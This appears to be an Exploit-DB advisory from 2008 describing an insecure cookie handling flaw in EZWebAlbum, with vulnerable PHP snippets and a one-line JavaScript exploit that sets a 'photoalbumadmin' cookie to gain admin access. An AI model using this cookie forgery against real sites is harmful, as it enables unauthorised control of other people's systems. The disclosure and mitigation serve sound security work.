EZWebAlbum Insecure Cookie Handling Vulnerability

vendor:

EZWebAlbum

by:

Virangar Security Team

7.5

CVSS

HIGH

Insecure Cookie Handling

264

CWE

Product Name: EZWebAlbum

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

EZWebAlbum Insecure Cookie Handling Vulnerability

EZWebAlbum suffers from insecure cookie handling, when a admin login is successful the script creates a cookie to show the rest of the admin area the user is already logged in. The bad thing is the cookie doesn't contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are logged in as a legit admin. An attacker can exploit this vulnerability by crafting a malicious cookie and gaining access to the admin area.

Mitigation:

Ensure that cookies are properly secured and encrypted to prevent malicious users from crafting malicious cookies.

Source

Exploit-DB raw data:

  ###################################################################################
  #                                                                                 #
  #      ...:::::EZWebAlbum Insecure Cookie Handling Vulnerability ::::....         #           
  ###################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(Zahra:zh_virangar)

special tnx :my master hadihadi

tnx to:MR.nosrati,black.shadowes,MR.hesy

& all virangar members & all hackerz
-------
DESCRIPTION:
EZWebAlbum, suffers from insecure cookie handling, when a admin login is successfull the script creates
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
logged in as a legit admin.
---
some code in index.php:

    if ( $HTTP_POST_VARS['enteredadminpassword'] == $adminpassword )
    {
        setcookie("photoalbumadmin","1");
        header("Location: index.php");
    }
**********************
now vuln code in constants.inc:
$gotalbumadminrights = False;

if (isset($photoalbumadmin))
{
    $gotalbumadminrights = True;
}//SET ADMIN RIGHTS IF COOKIE FOUND
---
exploit:
javascript:document.cookie = "photoalbumadmin=1; path=/";
-----
now   you can get admin access and manage the cms ;)
[+]Example:add a new page in addpage.php
-------
young iranian h4ck3rz

# milw0rm.com [2008-07-21]